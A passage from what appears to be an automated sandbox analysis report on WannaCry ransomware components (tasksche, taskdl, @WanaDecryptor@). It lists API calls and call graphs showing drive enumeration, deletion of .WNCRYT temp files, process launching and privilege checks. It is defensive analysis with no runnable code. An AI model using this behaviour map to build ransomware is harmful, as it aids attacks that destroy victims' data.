      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002C15
      • Part of subcall function 10002BA0: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
      • Part of subcall function 10002BA0: ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
      • Part of subcall function 10002BA0: ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002D04
      • Part of subcall function 10002BA0: DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
    • ??3@YAXPAX@Z.MSVCRT ref: 100028FD
    • ??3@YAXPAX@Z.MSVCRT ref: 10002917
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005480, Relevance: 6.1, APIs: 4, Instructions: 65
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,76E6C426), ref: 100054B6
    • wcslen.MSVCRT ref: 100054C3
    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
    • wcslen.MSVCRT ref: 100054FC
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004A9E
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004AC0
      • Part of subcall function 10004A40: wcschr.MSVCRT ref: 10004AE9
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004B25
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004B3D
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
      • Part of subcall function 10004A40: FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BD7
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BF5
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004C51
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
      • Part of subcall function 10004A40: FindNextFileW.KERNEL32(?,?), ref: 10004CA2
      • Part of subcall function 10004A40: FindClose.KERNEL32(?), ref: 10004CB5
      • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd

    Analysis Process: taskdl.exe PID: 3320 Parent PID: 3240

    Execution Graph

    Execution Coverage:14.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:18.3%
    Total number of Nodes:93
    Total number of Limit Nodes:1

    Graph

    %3 314 401a48 _exit 212 4018f6 __set_app_type __p__fmode __p__commode 213 401965 212->213 214 401979 213->214 215 40196d __setusermatherr 213->215 224 401a66 _controlfp 214->224 215->214 217 40197e _initterm __getmainargs _initterm 218 4019d2 GetStartupInfoA 217->218 220 401a06 GetModuleHandleA 218->220 225 4012c0 GetLogicalDrives 220->225 224->217 226 4012e0 225->226 227 401305 GetDriveTypeW 226->227 229 401324 exit _XcptFilter 226->229 227->226 228 401311 227->228 232 401080 228->232 254 401000 GetWindowsDirectoryW 232->254 234 4010d5 swprintf FindFirstFileW 235 401114 234->235 240 40114a 234->240 237 401136 235->237 260 401870 235->260 236 40114e swprintf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 236->240 266 4018d0 free 237->266 240->236 242 4011ae ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 240->242 267 4013d0 240->267 242->240 243 4011d9 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N FindNextFileW 243->236 244 401204 FindClose 243->244 251 401215 244->251 245 40124a 246 401265 245->246 247 401254 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 245->247 249 40127e ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 246->249 250 40128f 246->250 247->246 247->247 248 401239 DeleteFileW 248->251 249->249 249->250 296 4018d0 free 250->296 251->245 251->248 253 401140 Sleep 253->226 255 40105e swprintf 254->255 256 401022 GetTempPathW wcslen 254->256 257 401073 255->257 256->257 258 40103e wcslen 256->258 257->234 258->257 259 40104c wcslen 258->259 259->234 261 40187a 260->261 262 401885 260->262 261->262 297 4018d0 free 261->297 263 4018bb 262->263 298 4018d0 free 262->298 263->235 266->253 268 40152b 267->268 276 4013f2 ??2@YAPAXI 267->276 269 4015e7 268->269 283 40153e 268->283 270 401677 269->270 271 401616 269->271 280 401690 7 API calls 269->280 270->243 277 401629 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 271->277 278 401647 271->278 272 401574 273 40159e 272->273 275 401690 7 API calls 272->275 273->270 274 4015b3 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 273->274 274->274 281 4015cd 274->281 275->272 284 401440 276->284 285 401458 276->285 277->277 277->278 278->270 286 40165c ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 278->286 279 401690 7 API calls 279->283 280->269 281->243 283->272 283->279 284->285 299 401690 284->299 291 401690 7 API calls 285->291 294 40147e 285->294 286->270 286->286 288 4014b5 289 4014bf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 288->289 290 4014d0 288->290 289->289 289->290 313 4018d0 free 290->313 291->285 293 401690 7 API calls 293->294 294->288 294->293 295 4014d9 295->243 296->253 297->262 298->263 300 4016c0 299->300 308 4017c4 299->308 301 4016e8 300->301 302 40175b 300->302 304 4016ee ?_Xran@std@ 301->304 305 4016f4 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 301->305 303 4017b5 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 302->303 309 401775 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 302->309 303->308 304->305 306 401705 305->306 307 401740 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 306->307 311 401721 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 306->311 307->284 308->284 310 401786 309->310 310->284 311->307 312 401737 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 311->312 312->307 313->295 315 401a9b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 316 401360 317 4013a7 316->317 321 401372 316->321 323 4018d0 free 317->323 319 4013b0 321->317 322 4018d0 free 321->322 322->321 323->319

    Executed Functions

    Function 004018F6, Relevance: 16.6, APIs: 11, Instructions: 111
    APIs
    • __set_app_type.MSVCRT ref: 00401923
    • __p__fmode.MSVCRT ref: 00401938
    • __p__commode.MSVCRT ref: 00401946
    • __setusermatherr.MSVCRT ref: 00401972
      • Part of subcall function 00401A66: _controlfp.MSVCRT ref: 00401A70
    • _initterm.MSVCRT ref: 00401988
    • __getmainargs.MSVCRT ref: 004019AB
    • _initterm.MSVCRT ref: 004019BB
    • GetStartupInfoA.KERNEL32(?), ref: 004019FA
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401A1E
      • Part of subcall function 004012C0: GetLogicalDrives.KERNEL32 ref: 004012C7
      • Part of subcall function 004012C0: GetDriveTypeW.KERNEL32(?,?,?,?,00000000,?,0000000A), ref: 0040130A
      • Part of subcall function 004012C0: Sleep.KERNEL32(0000000A,00000000,?,0000000A), ref: 0040131C
    • exit.MSVCRT ref: 00401A2E
    • _XcptFilter.MSVCRT ref: 00401A40
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    Function 004012C0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
    APIs
    • GetLogicalDrives.KERNEL32 ref: 004012C7
    • GetDriveTypeW.KERNEL32(?,?,?,?,00000000,?,0000000A), ref: 0040130A
      • Part of subcall function 00401080: swprintf.MSVCRT(?,%s\*%s,?,.WNCRYT,76E6EEF2,00000000), ref: 004010F5
      • Part of subcall function 00401080: FindFirstFileW.KERNEL32(?,?), ref: 00401107
      • Part of subcall function 00401080: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401168
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
      • Part of subcall function 00401080: wcslen.MSVCRT ref: 00401182
      • Part of subcall function 00401080: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
      • Part of subcall function 00401080: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
      • Part of subcall function 00401080: FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
      • Part of subcall function 00401080: FindClose.KERNEL32(00000000), ref: 00401205
      • Part of subcall function 00401080: DeleteFileW.KERNEL32(?), ref: 0040123A
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
      • Part of subcall function 00401080: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
    • Sleep.KERNEL32(0000000A,00000000,?,0000000A), ref: 0040131C
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd

    Non-executed Functions

    Function 00401080, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 173
    APIs
      • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E6C426,00000019,004010D5,?,?,76E6C426,00000019,76E6EEF2,00000000), ref: 0040100C
      • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
      • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
      • Part of subcall function 00401000: swprintf.MSVCRT(00000019,%C:\%s,?,$RECYCLE), ref: 0040106A
    • swprintf.MSVCRT(?,%s\*%s,?,.WNCRYT,76E6EEF2,00000000), ref: 004010F5
    • FindFirstFileW.KERNEL32(?,?), ref: 00401107
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401168
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
    • wcslen.MSVCRT ref: 00401182
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
      • Part of subcall function 004013D0: ??2@YAPAXI@Z.MSVCRT ref: 00401423
      • Part of subcall function 004013D0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 004015C0
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040163D
      • Part of subcall function 004013D0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040166A
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
    • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
    • FindClose.KERNEL32(00000000), ref: 00401205
    • DeleteFileW.KERNEL32(?), ref: 0040123A
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
      • Part of subcall function 004018D0: free.MSVCRT(?,004014D9,?,?,?,00000001,?), ref: 004018D4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    Function 00401000, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44
    APIs
    • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E6C426,00000019,004010D5,?,?,76E6C426,00000019,76E6EEF2,00000000), ref: 0040100C
    • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
    • wcslen.MSVCRT ref: 00401035
    • wcslen.MSVCRT ref: 0040103F
    • wcslen.MSVCRT ref: 0040104D
    • swprintf.MSVCRT(00000019,%C:\%s,?,$RECYCLE), ref: 0040106A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    Function 00401690, Relevance: 10.6, APIs: 7, Instructions: 139
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016EE
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016F6
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?), ref: 00401779
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000), ref: 004017BA
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
    Function 004013D0, Relevance: 7.8, APIs: 5, Instructions: 264
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00401423
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
      • Part of subcall function 004018D0: free.MSVCRT(?,004014D9,?,?,?,00000001,?), ref: 004018D4
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 004015C0
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040166A
      • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016EE
      • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?,?), ref: 004016F6
      • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
      • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
      • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
      • Part of subcall function 00401690: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000,?), ref: 00401779
      • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,768FE87C,00000000,00000000), ref: 004017BA
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,768FE87C,00000000,00000000,?,?,00000001,?), ref: 0040163D
    Memory Dump Source
    • Source File: 0000000A.00000002.1619051545.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.1619044990.00400000.00000002.sdmp
    • Associated: 0000000A.00000002.1619057686.00402000.00000002.sdmp
    • Associated: 0000000A.00000002.1619064290.00403000.00000004.sdmp
    • Associated: 0000000A.00000002.1619070180.00404000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd

    Analysis Process: @WanaDecryptor@.exe PID: 3408 Parent PID: 3240

    Execution Graph

    Execution Coverage:6.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:11.6%
    Total number of Nodes:1704
    Total number of Limit Nodes:11

    Graph

    %3 6208 401600 6209 40161a 6208->6209 6210 4016e5 6208->6210 6211 40168f 6209->6211 6212 40161d 6209->6212 6213 4016de 6210->6213 6214 4016e9 #537 6210->6214 6211->6213 6215 401693 #537 6211->6215 6216 401743 #2385 6212->6216 6219 40165e 6212->6219 6220 401628 #537 6212->6220 6213->6216 6231 401970 #3092 #6199 #800 6214->6231 6230 401970 #3092 #6199 #800 6215->6230 6219->6213 6223 401663 #537 6219->6223 6228 401970 #3092 #6199 #800 6220->6228 6221 401701 SendMessageA #2385 6222 4016ab SendMessageA #2385 6229 401970 #3092 #6199 #800 6223->6229 6225 401640 #2385 6227 40167b #2385 6228->6225 6229->6227 6230->6222 6231->6221 5157 40bed0 5158 40bef5 5157->5158 5159 40bf0a #823 5157->5159 5158->5159 5160 40bf2e 5159->5160 5161 40bf27 5159->5161 5163 40bf46 5160->5163 5164 40baf0 99 API calls 5160->5164 5162 40d5e0 4 API calls 5161->5162 5162->5160 5165 40bf6b 5164->5165 5166 40bf8a GetComputerNameA GetUserNameA 5165->5166 5167 40bf72 5165->5167 5168 40dc00 4 API calls 5166->5168 5169 40c013 5168->5169 5170 40dd00 4 API calls 5169->5170 5171 40c01f 5170->5171 5172 40dc00 4 API calls 5171->5172 5173 40c038 5172->5173 5174 40dd00 4 API calls 5173->5174 5175 40c047 5174->5175 6232 40c6a0 6233 40c6aa 6232->6233 6235 40c6b8 6232->6235 6234 40c6be #825 6233->6234 6233->6235 6234->6235 5856 4067f0 IsIconic 5857 406808 7 API calls 5856->5857 5858 40689a #2379 5856->5858 5572 4019f0 #765 5573 401a08 5572->5573 5574 4019ff #825 5572->5574 5574->5573 4641 4043e0 #4284 #3874 #5277 6009 403560 6010 40358c #4376 6009->6010 6011 40356e GetExitCodeThread 6009->6011 6012 403593 6010->6012 6011->6010 6011->6012 5156 4063a0 15 API calls 5281 4064d0 #4710 SendMessageA SendMessageA 5324 401c70 wcscat 5281->5324 5283 406516 5284 406577 5283->5284 5285 40651d GetModuleFileNameA strrchr 5283->5285 5334 401a10 5284->5334 5287 40655d strrchr 5285->5287 5288 40656c SetCurrentDirectoryA 5285->5288 5287->5288 5288->5284 5289 406585 5290 40658c time 5289->5290 5291 4065e5 5289->5291 5292 401a10 5 API calls 5290->5292 5344 402c40 5291->5344 5292->5291 5294 4065ed WSAStartup __p___argc 5295 40678c 5294->5295 5296 40660f __p___argv 5294->5296 5392 407e80 SHGetFolderPathW wcslen 5295->5392 5299 406621 5296->5299 5298 406793 SetWindowTextW 5395 406f80 5298->5395 5301 406652 5299->5301 5302 406661 __p___argv 5299->5302 5350 407f80 fopen 5301->5350 5305 40666d 5302->5305 5303 4067a9 5453 406c20 GetUserDefaultLangID GetLocaleInfoA 5303->5453 5309 40669e 5305->5309 5310 4066ad __p___argv 5305->5310 5308 4067b0 SetTimer SetTimer 5360 4080c0 FindFirstFileA 5309->5360 5314 4066b9 5310->5314 5314->5295 5315 4066ee Sleep 5314->5315 5378 401bb0 AllocateAndInitializeSid 5315->5378 5317 406734 5318 406750 sprintf 5317->5318 5319 406738 5317->5319 5384 401a90 CreateProcessA 5318->5384 5383 401b50 ShellExecuteExA 5319->5383 5322 40674b ExitProcess 5325 401cdc 5324->5325 5327 401ce0 5325->5327 5326 401d00 RegCreateKeyW 5326->5327 5327->5325 5327->5326 5328 401dbb 5327->5328 5329 401d62 RegQueryValueExA 5327->5329 5330 401d1d GetCurrentDirectoryA RegSetValueExA 5327->5330 5328->5283 5331 401d9e RegCloseKey 5329->5331 5332 401d90 SetCurrentDirectoryA 5329->5332 5330->5331 5331->5327 5333 401dc8 5331->5333 5332->5331 5333->5283 5335 401a1a fopen 5334->5335 5337 401a3a 5335->5337 5338 401a6f 5335->5338 5339 401a46 fread 5337->5339 5340 401a53 fwrite 5337->5340 5338->5289 5341 401a5e 5339->5341 5340->5341 5342 401a66 fclose 5341->5342 5343 401a74 fclose 5341->5343 5342->5338 5343->5289 5462 404b70 5344->5462 5346 402c46 5347 402c57 5346->5347 5348 402c5e LoadLibraryA 5346->5348 5347->5294 5348->5347 5349 402c73 7 API calls 5348->5349 5349->5347 5351 407fd0 fread fclose 5350->5351 5359 406659 ExitProcess 5350->5359 5467 40be90 strncpy strncpy strncpy 5351->5467 5353 408002 5468 40c4f0 5353->5468 5355 40801d 5356 40c4f0 112 API calls 5355->5356 5357 408041 5355->5357 5356->5357 5358 401a10 5 API calls 5357->5358 5357->5359 5358->5359 5361 40820a 5360->5361 5373 408124 5360->5373 5482 401e30 5361->5482 5364 4081e4 FindNextFileA 5365 4081ff FindClose 5364->5365 5364->5373 5365->5361 5366 408158 sscanf 5366->5364 5368 408178 fopen 5366->5368 5367 401e30 2 API calls 5369 408255 sprintf #537 5367->5369 5368->5364 5370 408190 fread 5368->5370 5371 4082c0 141 API calls 5369->5371 5372 4081bd fclose 5370->5372 5370->5373 5374 40828c 5371->5374 5372->5364 5372->5373 5373->5364 5373->5366 5373->5372 5375 4066a5 ExitProcess 5374->5375 5376 408291 #537 5374->5376 5377 4082c0 141 API calls 5376->5377 5377->5375 5379 401bf6 5378->5379 5380 401bfb CheckTokenMembership 5378->5380 5379->5317 5381 401c14 FreeSid 5380->5381 5382 401c10 5380->5382 5381->5317 5382->5381 5383->5322 5385 401b45 5384->5385 5386 401aed 5384->5386 5385->5322 5387 401af5 WaitForSingleObject 5386->5387 5388 401b26 CloseHandle CloseHandle 5386->5388 5389 401b12 5387->5389 5390 401b05 TerminateProcess 5387->5390 5388->5322 5389->5388 5391 401b1a GetExitCodeProcess 5389->5391 5390->5389 5391->5388 5393 407f02 5392->5393 5394 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 5392->5394 5393->5298 5394->5298 5489 4076a0 5395->5489 5397 406fa8 27 API calls 5398 407119 5397->5398 5399 40711c SendMessageA #3092 5397->5399 5398->5399 5400 40713d SendMessageA #3092 5399->5400 5402 40715f SendMessageA #3092 5400->5402 5404 407181 SendMessageA #3092 5402->5404 5406 4071a3 SendMessageA #3092 5404->5406 5408 4071c5 SendMessageA #3092 5406->5408 5410 4071e7 5408->5410 5411 4071ea SendMessageA #3092 5408->5411 5410->5411 5412 407205 SendMessageA #3092 5411->5412 5414 407227 SendMessageA #3092 5412->5414 5416 407249 SendMessageA #3092 5414->5416 5418 40726b 5416->5418 5419 40726e SendMessageA #860 5416->5419 5418->5419 5420 4072a4 5419->5420 5421 4072ed #537 5420->5421 5505 404210 #858 #800 5421->5505 5423 407309 #537 5506 404210 #858 #800 5423->5506 5425 407325 #540 #2818 #535 5507 404210 #858 #800 5425->5507 5427 407369 5508 404270 5427->5508 5431 4073a8 SendMessageA SendMessageA #6140 #6140 5432 407428 5431->5432 5512 405920 5432->5512 5436 407457 5520 4058c0 5436->5520 5438 407460 5523 405180 _mbscmp 5438->5523 5440 407477 5441 405920 2 API calls 5440->5441 5442 4074ac 5441->5442 5443 405860 2 API calls 5442->5443 5444 4074b5 5443->5444 5445 4058c0 2 API calls 5444->5445 5446 4074be 5445->5446 5447 405180 4 API calls 5446->5447 5448 4074d5 GetTimeZoneInformation 5447->5448 5529 401e60 VariantTimeToSystemTime 5448->5529 5450 407508 SystemTimeToTzSpecificLocalTime #2818 5530 401e60 VariantTimeToSystemTime 5450->5530 5452 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 